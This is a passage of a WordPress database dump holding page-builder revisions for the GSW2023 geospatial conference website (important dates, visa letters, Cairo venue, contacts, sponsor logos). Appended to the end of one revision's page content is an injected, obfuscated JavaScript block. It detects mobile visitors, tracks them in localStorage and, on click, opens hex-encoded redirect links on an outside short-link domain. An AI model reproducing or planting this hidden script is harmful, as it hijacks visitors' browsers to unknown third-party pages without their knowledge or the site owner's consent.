0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:45:08','2023-06-23 20:45:08','',3066,'https://gsw2023.com/?p=4753',0,'revision','',0),
(4754,4,'2023-06-23 20:47:28','2023-06-23 20:47:28','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone 